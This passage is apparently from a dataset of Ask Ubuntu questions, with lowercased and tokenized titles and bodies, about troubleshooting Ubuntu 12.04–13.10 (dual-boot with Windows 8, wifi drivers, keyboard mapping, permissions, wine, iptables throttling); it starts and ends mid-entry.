ln -sf swt32.jar ./x10flasher_lib/swtmac/swt.jar fi if test $ isjava6 -gt 0 -o $ isjava7 -gt 0 then java -xstartonfirstthread -xms128m -xmx512m -duser.country=us -duser.language=en -jar x10flasher.jar else echo `` java version must be 1.6 or 1.7 '' fi fi i think the problem lies in these lines export ld_library_path=./x10flasher_lib/linux/lib32 export ld_library_path=./x10flasher_lib/linux/lib64 : $ ld_library_path ln -sf libusbx-1.0.so.0.1.0 ./x10flasher_lib/linux/lib32/libusbx-1.0.so ln -sf libusbx-1.0.so.0.1.0 ./x10flasher_lib/linux/lib64/libusbx-1.0.so
366339	windows 8 not showing up in ubiquity for ubuntu 13.10	i am trying to dual-boot a laptop with win8.1 and ubuntu 13.10 . i can get it to boot to the live usb easily , but on the part in ubiquity where you select what to do with existing os 's , it does not detect windows . here 's what i 've tried : 1 . ( in terminal ) winosdata=true ubiquity , which still did not detect windows 2 . turning off uefi , which prevented windows from booting i think that doing a manual partitioning and then running boot-repair would work , but i am not confident enough to try it . if there is a way to restore the windows bootloader without wiping out files and/or programs in windows , i would also like to know . what should i do to dual-boot ubuntu ? in case you need to know , the partitions : 450 mb recovery 260 mb efi system 919.98 gb windows 350 mb recovery 10.37 gb recovery i have no idea why there are 3 recovery partitions . it is a toshiba . edit : i tried again after installing windows 8.1 , and the result is still the same . also i am wondering if there is a way to manually add windows to grub in case the installer does not create it and boot-repair dose work .
366342	what is widget layer ?	i was looking through the settings in compiz and i found this : i have no idea what it does as i have pressed f9 and it just made my screen dim ( the kind you get when ubuntu is n't responding ) , but now i want to know how to use it properly . anyone know ?
366346	remap keyboard ubuntu 12.04 ; asus q500a	i have an asus q500a with win8 and ubuntu 12.04 64 bit with linux kernel 3.8.0-32-generic . i am using gnome-panel , and xserver-xorg-lts-raring . i have been experiencing problems with the keyboard short-cuts since i had a fresh install . fn+f10 is supposed to mute my system , but instead it will repeatedly press d. fn+f11 is volume down , but it presses c. fn+f12 is volume up , presses b repeatedly . other on-board short-cuts such as adjusting screen and led brightness work most of the time , but sometimes press other letters repeatedly . also , sometimes my ctrl gets held down for no reason . everything works fine in windows . i have tried installing all recommends and did sudo dpkg-reconfigure -a ( use caution with this command ) to reconfigure all packages , which did not solve my problem . i have tried using keytouch editor to edit keymaps , navigating to /usr/shar/x11/xkb/keymap when i try opening any of these files it says file contains no keyboard element . i think if i were just able to remap my keyboard it might solve my issues , otherwise if anyone knows where i can get asus drivers for 12.04 please let me know . apparently i did n't have all repositories enabled . i executed the following commands and am trying the updates they give me . getting linux_kernel 3.8.0-33 generic as well as a bunch of other packages : sudo add-apt-repository `` deb http : //archive.ubuntu.com/ubuntu $ ( lsb_release -sc ) universe '' sudo add-apt-repository `` deb http : //archive.ubuntu.com/ubuntu $ ( lsb_release -sc ) main universe restricted multiverse '' sudo add-apt-repository `` deb http : //archive.canonical.com/ubuntu $ ( lsb_release -sc ) partner '' i tried using keytouch along with keytouch-editor to set my extra function keys . it reads the keys when i press them , but then they do n't function as i set them . i tried using showkey -k and pressing the keys to see how they are read . i noticed the problem key combonations do not read as being released . just pressed . the other keys do display released .
366347	how to create a directory for everybody ?	i have a lot of music that i want to share with and on all the accounts on my ubuntu linux box . i created one in /usr/share/usrmusic changed the user and groups to userx : users and the permissions to drwxrw-rw- 3 userx users 4096 oct 26 12:20 usrmusic under a different user i can not get into the directory it is now highlighted for whatever reason and then when i went into a different account to try and get to it it will not let me in saying i do n't have permissions usera @ bw : /usr/share $ usera @ bw : /usr/share $ cd usrmusic bash : cd : usrmusic : permission denied usera @ bw : /usr/share $ if i go su i can of course all permissions are set to drwxrw-rw- 312 userx users on everything in the directory and sub-directories i added usera to the users group and still i can not access it at all , and how do i get the directories to not be highlighted like it is now an executable directory ? it should n't be this hard !
366350	time is not displaying in the top bar	i 'm running ubuntu 13.10 with dual boot along side windows 8 . the top panel or bar does n't display the time . when i open the clock menu , all the settings over there are grayed out ( settings - > time and date - > clock ) i tried other methods ( like dconf ) but that did n't work .
366351	changing folder name of mounted usb drive ( ntfs ) in /media	question as simple as in title . after connecting my usb hdd , system automounts it in /media/1e6a441d6a43f057 . i would like to mount it in /media/hdh . how to do it ? adding to fstab : uuid=1e6a441d6a43f057 /media/hdh ntfs-3g defaults , noauto , locale=pl_pl.utf-8 0 0 did not help ! : (
366353	libusb not found ( though installed already ) ubuntu 13.10	i needed to run xperia flashtool on ubuntu . but when i run it , i always get an error : libusb not found ! but i already installed libusbx ! i do n't get it . i 'm sorry . i 'm new to ubuntu / linux .
366354	how to make micromax usb modem being recognised by ubuntu 12.04 lts ?	i am not able to see my micromax usb modem which i connected to use the internet . i have tried all the methods being proposed in the forum but of no use . anyone can please assist me in solving the problem . i would also like to mention that i have tried doing the same using the nokia mobile usb but it works perfectly there . seeking help !
366358	change power button to 'ask ' in xubuntu 13.10	i have recently installed xubuntu 13.10 on my vaio vpcea making me a linux beginner . the problem is that laptop 's power button is right on the edge of the bezel making it far too easy to press accidentally , in my opinion a design fault by sony . at present , when i press the power button it shuts down strait away and as you can imagine , when i 'm accidentally pressing it all the time it gets very annoying ! so i planned to change it to ask what i would like to do when i press it or at least ask if i 'm sure . so i went through the xfce gui options `` settings manager '' - `` power manager '' to the field `` when power button is pressed '' , but it was already set to `` ask '' . so i did some digging and found a thread telling me to navigate to /etc/xdg/xfce4/xfconf/xfce-perchannel-xml/xfce4-power-manager.xml where it said to find power-button-action and check that value= '' 3 '' . it already did . so i looked some more and found this thread which focuses on acpi scripts . i tried solution 1 & 2 using sudoedit to change the files accordingly ( i have made executable bash shell scripts already so i think i followed them correctly ) , but still no difference . i also found this thread which instructed me to edit /etc/systemd/logind.conf so that handlepowerkey=ignore . still no luck . i even tried my own approach to completely disable /etc/acpi/powerbtn.sh by renaming it powerbtn.sh.bak hoping for at least no response from the power button ... and i have done many reboots in between ... but still it shuts down ! i have also read that some people have the file /etc/acpi/events/power_button , but i do not . so does anyone have any other ideas ? what else could be executing the shutdown sequence is there something i 'm missing ? i have n't undone any of these actions so every one of the above files is currently edited on my computer , with the exception that `` solution 2 '' automatically undone `` solution 1 '' above . thanks guys .
366363	localised unix shell ?	is it possible to get a localised unix shell , for example , in japanese , arabic or hebrew ? since it should fit on a cd , i want to save space by using byobu instead of a gui . but i would like to have an localised command-line interface ( at least for logging in ) .
366366	geany shortcuts do not work after using its terminal	after lots of confusion i finally discovered that geany 's shortcuts ( ctrl-q , f5 , etc . ) stop working because i use its built-in terminal to run python . on the other hand , ctrl+w , ctrl-o still work ! i did quit python in terminal , using both ctrl+d and exit ( ) but this problem persists . any idea ? i 'm using geany 0.21 , ubuntu 12.04
366368	network-manager openvpn dependencies issue - install error - ubuntu 13.10	i 'm using ubuntu 13.10 , 64bit . i tried installing openvpn network manager but the installation was halted due to dependencies issue . even i tried with `` apt-get -f '' , which also had the same error . $ sudo apt-get install openvpn network-manager-openvpn reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : icaclient : depends : libc6-i386 ( > = 2.7-1 ) but it is not going to be installed depends : ia32-libs but it is not installable depends : lib32z1 but it is not going to be installed depends : lib32asound2 but it is not installable depends : nspluginwrapper but it is not going to be installed openvpn : depends : libpkcs11-helper1 ( > = 1.05 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
366371	black screen , blinking cursor and purple line left	last week i installed ubuntu on my notebook , now i 'm also trying to install it on my pc , but with no luck . when i start from my usb stick ( same as i installed my notebook with , ubuntu 13.04 ) first i 'll see an purple screen , after this it shows a black screen , blinking cursor and the a small line on the left is purple . i 've started searching on google , and tried the nomodeset function on the first black screen . here it does n't show the purple line on the left , but still an black screen with blinking cursor.. now i tried to install 13.10 and 12.10 on the usb stick , but with no luck . exactly the same things happened . after this , i tried some other things : acpi=off = same effect as nomodeset . nolapic = same as `` normal '' boot ( purple line , black screen ) , but without the blinking cursor . desktop specifications : intel xeon e3-1240 v2 geforce gtx 640 ti boost 6gb of memory 3 displays , the purple line is always on the `` main '' screen ( middle one ) . currently windows 8 pro installed . asrock b75 pro3-m
366374	error while opening maya 2012	hi i have installed maya2012 but when i am trying to run maya by typing `` maya '' in the terminal then i am getting this error : '' bash : /usr/local/bin/maya : /bin/csh : bad interpreter : no such file or directory '' kindly help me
366376	flickering mouse ?	i 'm still amateur in using ubuntu , here my question 1-how to fix flickering pointer ? 2-why video can not be played ? if possible provide answer in simple step and easy to understand
366378	throttle bandwith for a specific user using iptables	i need to throttle internet speed for a user . more specifically i want to decrease it to 30 kbps from current 3.1mbps for one user . i search around , and found guides on how to do it using squid 's delay pools or other tools . but i do n't want to install any apps for this purpose . and i dont want to do it using the built-in netem module , because ( as far as i know ) it can delay traffic based only on interfaces , not based on users . is there is a way to do it in iptables ? ( p.s . another reason i want to do it in iptables is because later on i might have to modify rule to do the same for a specific client in my private network based on ip/mac . )
366380	gigabyte gcwb-300d	i am looking for drivers gigabyte gcwb-300d wifi/bluetooth card for ubuntu 12.10 . i have not been able to find anything but windows drivers . any help would be greatly appreciated
366386	how do i change the color of the screen that is displayed before the login screen ?	how do i change the color that the system displays just before the login screen is displayed ? here is the boot sequence on my machine in the order that things are displayed : the bios screen is flashed . a black screen is displayed for a few seconds . my plymouth splash screen is displayed . purple screen is displayed for a few seconds ( this is what i want to change ) . finally , the login screen is displayed . please let me know if you require any additional information while addressing this problem and as always , thank you for your time .
366388	problems with ubuntu 13.04 ( wifi and screen brightness ) on hp 2000-2b59wm	i use linux for over 2 years on my desktop computer , so far i never had many problems and it always worked fine for my needs as an engineering student . going straight to the point , there is no property driver for my laptop , because as far as i know this laptop of mine was designed specially for windows 8 and nothing else . even installing windows 7 was a nightmare ! some months ago i made the possible worst purchase of my life , i bought this hp laptop - that was the first time i bought a laptop , i did n't know how much trouble i could get ... my current problems are : i lose the wifi connection if i leave the room where the wifi modem is ... and everytime i start the laptop the brightness start at 0 . well , i looked for solutions regarding my laptop model and could n't find much help as many of the tips did n't work in my laptop , so if you could help me that would be great . the details regarding my laptop are in this link - > http : //h10025.www1.hp.com/ewfrf/wc/document ? cc=us & lc=en & docname=c03529755 # n46 apparently i am the only one in the world who is still trying to use ubuntu with this laptop ...
366389	too many unsolicited `` incoming connections ''	with the ufw rule `` deny incoming '' , ufw logs as many as 2 to 3 block packets from random ips on random ports . i find it quite irritating . i was just wondering if this is normal `` midirected '' internet traffic or is bad people trying to sniff pcs for open ports ? does everyone else get as incoming connections ? ? ? and just in case you 're thinking torrents . no . incoming connections start as soon as i connect to internet without running any net using apps , in foreground or background .
366391	install wine on xubuntu 13.10	i do n't succeed in installing wine on xubuntu 13.10 : package dependencies can not be resolved wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.12ubuntu1 is to be installed depends : libc6 ( > = 2.14 ) but 2.17-93ubuntu4 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu7 ) but 1.4.1-0ubuntu7 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu7 ) but it is a virtual package i 've searched a lot , and tested a lot of solutions but it does n't work . please help , this configuration is about a professional migration from proprietary os !
366393	0ad not in the path and does not appear in unity menu	i installed 0ad from ubuntu app center or from terminal and in both cases , i did not find it in the unity menu and 0ad was not in the path . 0ad is in /usr/games/ and there is 0ad.desktop in /usr/share/applications/ so why am i not able to see it in unity menu ?
366395	storing website files in /usr/share/www/ instead of /var/www/	i have just seen the /var/ directory being defined as : multi-purpose log , temporary , transient , and spool files . a memory-based file system is sometimes mounted at /var . whereas /usr/ has been described as : the majority of user utilities and applications . and /usr/share/ is : architecture-independent files . to my eye , it looks like web apps i write fall under `` user utilities and applications '' ( but this is a server , so storing this stuff under my home directory is impractical if i want other admins to work on it ) . my web apps have nothing to do with the 'system architecture ' . hence , /usr/share/www/ looks like a great place to store web apps and serve from , as opposed to /var/www/ . i am aware apache server 's convention is to store in /var/ , but i 'm using a different server and even if i was using apache , i do n't mind stepping on this particular convention 's toes . my question is , any compelling arguments against using this directory ?
366399	why does ubuntu 13.10 keep asking for my gmail password ?	after upgrading to 13.10 , i am now getting a prompt for my gmail password every time i log in . there is no indication as to which service or application needs this information . if i enter the correct password i 'm told it is incorrect . my gmail account does not use two factor authentication . the problem has only started after an upgrade from 13.04 to 13.10 . how can i prevent this prompt appearing , and/or what is doing the prompting ?
366401	is there a way to get my netgear n900 to work with ubuntu ?	i 'm using a netgear n900 usb wireless adapter to pick up our home network connection while running windows 7 . i have ubuntu 12.04.3 running on a second hard drive in my computer that is not compatible with my adapter . i 'm not very familiar with how to work around in ubuntu yet and this is the only thing keeping me from using it . i 've seen this asked before but the instructions were very confusing to me ! help is appreciated
366403	dash key causes blue screen	when i click on dash i get a blue screen and the launcher icons fade . i know if i reboot this will correct itself but what causes this to happen ?
366405	how to get wacom bamboo pen ctl-470 on ubuntu 12.04	i bought a wacom tablet and i need to get it working i have tried the simple terminal codes like this : sudo add-apt-repository ppa : lekensteyn/wacom-tablet sudo apt-get update sudo apt-get install wacom-dkms but do n't work please help thanks in advance .
366406	how to boot ubuntu 12.04-64bit from a usb from compaq cq58	i try to boot ubuntu 12.04 , 64-bit on my compaq cq58 laptop from a usb but it is not working . i 've correctly installed the ubuntu on my pen drive following the instructions on ubuntu website . ( http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows ) these are my bios settings : post hotkey delay ( sec ) < 0 > cd-rom boot internal network adapter boot network boot protocol legacy support secure boot platform key enrolled pending action none clear all secure boot uefi boot order : usb diskette on key/usb hard disk os boot manager internal cd/dvd rom drive ! network adapter with these settings when i restart my computer what shows up is : boot device not found . this is what i get on the boot manager : boot option menu os boot manager boot from efi file ( arrow up ) and ( arrow down ) to change option , enter to select an option . press f10 to bios setup options , esc to exit . please help ... p.s . my laptop has windows 8
366407	bluetooth refuses to connect since update to ubuntu gnome 13.10	i can no longer connect to my bluetooth speakers since since upgrading to ubuntu gnome 13.10 and then gnome shell to 3.10 , which never were a problem with ubuntu gnome 13.04 . my bluetooth-dongle seems to working fine and i can even detect and add the speakers ( creative d100 ) but when i try to slide the button from off to on in the bluetooth settings it just slides back to off . the `` bluetooth-b '' in the upper right corner is also gone . i actually managed to connect after i added `` enable=socket '' under `` [ general ] '' /etc/bluetooth/audio.conf and the indicator on the speakers confirms the connection , but i can not find the speakers in the audio settings even then . i 've tried to solve this for several days , reading tons of other possibly related questions here on ask ubuntu and elsewhere but am unable to find a solution . any ideas ?
366409	huawei netsetter not getting recognized	am having ubuntu12.04 and my huawei303 net setter not getting recognized . it was working fine then suddenly stopped.i cant even find its name in wireless menu on top of the desktop . am using sony vaio laptop .
366412	windows 8.1 - unfixable grub	i have a gigabyte laptop that came with secure boot and windows 8 . after a bit of battling , i managed to get my dual boot with ubuntu 13.10.. anyway , i upgraded zindows to 8.1 , now grub is gone . i restarted from a live cd and chrooted to my drive . i used boot-repair multiple times ( with successful output ) both in default and with some advanced options ; also reinstalled grub manually ... each time it tries once to boot to grub but gives a message for a very short amount of time . i recorded it and it is a regular bios message `` rebbot and select proper boot device of insert boot media in selected boot device and press a key '' i even tried something called easybcd under winblows , it shows the correct boot options , but same there , it is unable to make the linux partition fire up . anyway , no way to boot my linux box . does anyone have an idea how to fix this ? no need to redirect me to another post with grub reinstall or boot-repair , seen them all ... i am thinking of trying this other boot loader , refind , to see if it works http : //www.rodsbooks.com/refind/index.html also re-reading this bios message , i 'm thinking my partition might not have a boot flag anymore ... i 'll try that too with parted . although both grub and win 8 are supposed to fire up from the same boot partition ( the efi one ) please help ! thx
366416	ubuntu 13.10 new keyboard stuff bugged wine games	i have made recently a fresh install of ubuntu 13.10 . since the first day i have problems with keyboard probably because of the new ibus thing ... my language is pt-pt . one of those problems is the wrong behaviours on wine . games i was running in ubuntu 13.04 ( tomb-raider , skyrim , shadow warrior and dark souls ) installed in the new ubuntu 13.10 they started to get key stuck when there is a combination like w+d+r ( drifting right + reloading ) and its not because of windows/wine problems because the prefixes are the same that i had in 13.04 . the key stuck as already been reported on winehq for skyrim for some one using linux mint that was based on the 13.10 . is there a way of making the keyboard work like i was in 13.04 ? or can i change the input type ? or downgrade ibus or something like that ?
366417	windows 8 bios - boot ubuntu from external hdd	my laptop came pre-loaded with windows 8 64-bit ( only storage device is a 128 gb ssd ) . since it is my school laptop/i 've heard creating a linux partition alongside windows 8 is not very wise i installed ubuntu onto my external hard drive . i have a 500gb external hdd with the following partitions : main partition - nfts - ~400 gb extension partition / - ext2 - ~25gb /home - ext2 - ~30gb swap - ext2 - 10gb /boot - ? - 10gb ? = not sure of partition using the pendrivelinux installer , i created a liveusb version of ubuntu 12.04 ( lts ) on a 4gb usb drive . using that , i installed ubuntu onto the external hard-drive , without any errors ( or at least none that i was notified of ) . using the bios settings , i changed the os-loading order so that it is in this order : my external usb hdd windows boot loader some other things therefore , ubuntu should load from my hard drive first , but it does n't . also , my hard drive is in working condition , and it turns on when bios starts ( there is a light indicator ) . when i start my laptop , it goes directly to windows 8 ( i have the fast startup setting disabled as well ) . so , is there any way for me to set it up so that when my hdd is connected , it will automatically load ubuntu ? thanks in advance !
366418	where is the gtk # widget for windows forms in mono ?	ok , i downloaded mono to program in c # . the installation worked fine and i have mono up and running . the problem is , i ca n't find the toolbox that contains stuff like : -- -- common controls containers menus and toolbars all windows forms -- -- this is for the visual design part ! i cant find them ! i also ca n't see the window to work on . ( by default its called `` form1 '' ) im trying to get mono to look like this image : http : //www.mono-project.com/file : md2.png see , the window in the middle called `` mainwindow '' i ca n't see that in mono . also , on the top right , i cant find that widget box ! help please ! thanks ! !
366420	move notify-osd location	i have a triple monitor setup and the notify area in the right-top-right location is annoying to see when something important comes up i want to to move it to the middle-to-right ( top-right of center monitor ) . move it left by 1920px .
366421	select ( loop ) or command not working in shell-script	i 've been tinkering with linux and unix for years but still a novice in my mind and recently find myself trying to be more pro with it as i work in it . so with that notion i 'm studying shell scripting . i 've hit a snag in ubuntu using the latest version 13.10 saucy . when i use the select command in a sh script it does n't work , depending on how i format the command it will either return unexpected `` do '' or unexpected `` done '' . see the following two examples : this section of code produces an unexpected `` do '' error : # /bin/bash ps3='please enter your choice' select opt in option1 option2 option3 quit do case $ opt in `` option1 '' ) echo `` you chose choice 1 '' ; ; `` option2 '' ) echo `` you chose choice 2 '' ; ; `` option3 '' ) echo `` you chose choice 3 '' ; ; `` quit '' ) break ; ; * ) echo invalid option ; ; esac done this section of code produces an unexpected `` done '' error . # /bin/bash ps3='please enter your choice' select opt in option1 option2 option3 quit ; do case $ opt in `` option1 '' ) echo `` you chose choice 1 '' ; ; `` option2 '' ) echo `` you chose choice 2 '' ; ; `` option3 '' ) echo `` you chose choice 3 '' ; ; `` quit '' ) break ; ; * ) echo invalid option ; ; esac done when i enter these parameters into the command line interactively or manually i get the desired result which is a list of choices to choose from . however when executed from a script i get the before mentioned errors . also a side note i have tried this in fedora as a script and it worked perfectly ! is there something i need to do differently or a setting in a configuration file i need to check ? am i the only one having this issue ?
366424	wireless device bug on 13.10 . bcm4313 registers as eth1 instead of wlan0 and no internet access	my hotel wifi requires me to login with a username & password after connecting to the hotspot . so , my browser would open a page with username & passwrd fields to login and then connect to internet . but unfortunately , firefox & chromium dont seem to work . i dont think it is browser related but a setting for the wifi router or driver which is creating this issue . using broadcom 801.11 sta wireless driver ( proprietary ) . tried open source as well but same result ! ! the image linked below shows my wifi connection setting & chromium . the login page itself comes up after a long time and after entering the credentials , it keeps loading for ever ! ! it is the same case for every other browser.. so i dont think its browser issue but something to do with wifi setting or network manager stuff.. interestingly , i am able to connect to wifi networks with wpa key without any issue . adhoc hotspot is a problem and that is my regular home network : ( .. i hope i can get some help solving this issue ! i have tried repeating the same hotspot after login from my android , by creating a virtual repeater with wpa key and it works . i can browse on ubuntu using this method.. but cant be doing this regularly ! i tried loading the same login page of the hotel wifi while browsing through my repeater wifi created on mobile and screen shot attached below . the page loads up quick and easy.. so this means something is wrong with the way network manager handles adhoc connectivity & login ? ? i installed wicd0 but it crashes on startup and not helpful at all ! ifconfig in my terminal results : krishna @ krishna-hp-envy-4-notebook-pc : ~ $ ifconfig eth0 link encap : ethernet hwaddr 28:92:4a:1d:54 : fa up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) eth1 link encap : ethernet hwaddr e0:06 : e6:89 : fa:49 inet addr:10.24.1.71 bcast:10.24.1.255 mask:255.255.255.0 inet6 addr : fe80 : :e206 : e6ff : fe89 : fa49/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:10940 errors:0 dropped:0 overruns:0 frame:348431 tx packets:6611 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7669631 ( 7.6 mb ) tx bytes:864195 ( 864.1 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:2146 errors:0 dropped:0 overruns:0 frame:0 tx packets:2146 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:166120 ( 166.1 kb ) tx bytes:166120 ( 166.1 kb ) i wonder why is the wireless configured under eth1 ? i think this is a bug with earlier ubuntu versions , but is this normal in 13.10 or is there a wrong configuration here ? the wireless device in my pc is bcm4313 and i have installed the bcmwl-kernel-sources , wireless-tools to support the device . i also reinstalled the bcmwl-kernel as suggested on broadcom website , via synaptic package manager . nothing has changed this situation ! i tried booting into liveusb and then ifconfig results show wireless under wlan0 . but then the wireless connects and loads the login page . so is the problem with the device configuration now ? i really want to get this fixed before i start configuring the other stuff like ati graphics and such on the laptop for overheating.. lack of internet access is too bad a bug for me : p any help is appreciated ! pastebin of dmesg : dmesg lsmod of my pc : module size used by nls_iso8859_1 12713 1 acpi_call 12714 0 nvram 14462 0 joydev 17575 0 uvcvideo 82247 0 videobuf2_vmalloc 13216 1 uvcvideo videobuf2_memops 13362 1 videobuf2_vmalloc videobuf2_core 40903 1 uvcvideo btusb 28326 0 videodev 139144 2 uvcvideo , videobuf2_core x86_pkg_temp_thermal 14269 0 intel_powerclamp 19031 0 coretemp 17728 0 kvm 457676 0 crct10dif_pclmul 14250 0 crc32_pclmul 13160 0 ghash_clmulni_intel 13259 0 aesni_intel 55720 0 aes_x86_64 17131 1 aesni_intel lrw 13294 1 aesni_intel gf128mul 14951 1 lrw glue_helper 14095 1 aesni_intel ablk_helper 13597 1 aesni_intel parport_pc 32866 0 cryptd 20501 3 ghash_clmulni_intel , aesni_intel , ablk_helper ppdev 17711 0 bnep 23966 2 rfcomm 74658 12 bluetooth 391597 22 bnep , btusb , rfcomm hp_wmi 18202 0 sparse_keymap 13890 1 hp_wmi snd_hda_codec_hdmi 41684 1 snd_hda_codec_idt 55098 1 snd_hda_intel 57183 3 snd_hda_codec 194881 3 snd_hda_codec_hdmi , snd_hda_codec_idt , snd_hda_intel snd_hwdep 13613 1 snd_hda_codec snd_pcm 107140 3 snd_hda_codec_hdmi , snd_hda_codec , snd_hda_intel snd_page_alloc 18798 2 snd_pcm , snd_hda_intel snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30465 1 snd_seq_midi snd_seq 66061 2 snd_seq_midi_event , snd_seq_midi fglrx 7500792 144 snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 30038 2 snd_pcm , snd_seq i915 734026 2 microcode 23650 0 psmouse 104113 0 snd 73802 17 snd_hwdep , snd_timer , snd_hda_codec_hdmi , snd_hda_codec_idt , snd_pcm , snd_seq , snd_rawmidi , snd_hda_codec , snd_hda_intel , snd_seq_device , snd_seq_midi rtsx_pci_ms 18320 0 serio_raw 13462 0 drm_kms_helper 53165 1 i915 memstick 16762 1 rtsx_pci_ms drm 303133 3 i915 , drm_kms_helper mei_me 18418 0 lpc_ich 21163 0 mei 78609 1 mei_me soundcore 12680 1 snd amd_iommu_v2 19198 1 fglrx i2c_algo_bit 13564 1 i915 wmi 19363 1 hp_wmi dm_multipath 27371 0 scsi_dh 14873 1 dm_multipath arc4 12573 2 hp_accel 26012 0 lis3lv02d 20280 1 hp_accel brcmsmac 564467 0 input_polldev 13896 1 lis3lv02d video 19574 1 i915 cordic 12574 1 brcmsmac brcmutil 15618 1 brcmsmac mac_hid 13253 0 bcma 51651 2 brcmsmac mac80211 634700 1 brcmsmac cfg80211 504229 2 brcmsmac , mac80211 lp 17799 0 parport 42481 3 lp , ppdev , parport_pc mmc_block 36316 2 rtsx_pci_sdmmc 23920 0 ahci 30063 3 libahci 32088 1 ahci r8169 73111 0 rtsx_pci 46133 2 rtsx_pci_ms , rtsx_pci_sdmmc mii 13981 1 r8169 dm_mirror 22326 0 dm_region_hash 20981 1 dm_mirror dm_log 18527 2 dm_region_hash , dm_mirror krishna @ krishna-hp-envy-4-notebook-pc : ~ $ lspci -v 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) subsystem : hewlett-packard company device 1895 flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=06 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : 60000000-60ffffff prefetchable memory behind bridge : 0000000040000000-000000004fffffff capabilities : < access denied > kernel driver in use : pcieport 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device 1895 flags : bus master , fast devsel , latency 0 , irq 46 memory at 61000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at 50000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : hewlett-packard company device 1895 flags : bus master , medium devsel , latency 0 , irq 41 memory at 61700000 ( 64-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : xhci_hcd 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) subsystem : hewlett-packard company device 1895 flags : bus master , fast devsel , latency 0 , irq 45 memory at 61714000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : < access denied > kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 1895 flags : bus master , medium devsel , latency 0 , irq 16 memory at 61719000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : hewlett-packard company device 1895 flags : bus master , fast devsel , latency 0 , irq 47 memory at 61710000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=07 , subordinate=07 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : 61600000-616fffff prefetchable memory behind bridge : 0000000061400000-00000000614fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=08 , subordinate=08 , sec-latency=0 memory behind bridge : 61500000-615fffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 1895 flags : bus master , medium devsel , latency 0 , irq 23 memory at 61718000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) subsystem : hewlett-packard company device 1895 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) subsystem : hewlett-packard company device 1895 flags : bus master , 66mhz , medium devsel , latency 0 , irq 44 i/o ports at 4088 [ size=8 ] i/o ports at 4094 [ size=4 ] i/o ports at 4080 [ size=8 ] i/o ports at 4090 [ size=4 ] i/o ports at 4060 [ size=32 ] memory at 61717000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) subsystem : hewlett-packard company device 1895 flags : medium devsel , irq 10 memory at 61715000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 4040 [ size=32 ] 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company radeon hd 7670m flags : bus master , fast devsel , latency 0 , irq 48 memory at 40000000 ( 64-bit , prefetchable ) [ size=256m ] memory at 60000000 ( 64-bit , non-prefetchable ) [ size=128k ] i/o ports at 3000 [ size=256 ] expansion rom at 60020000 [ disabled 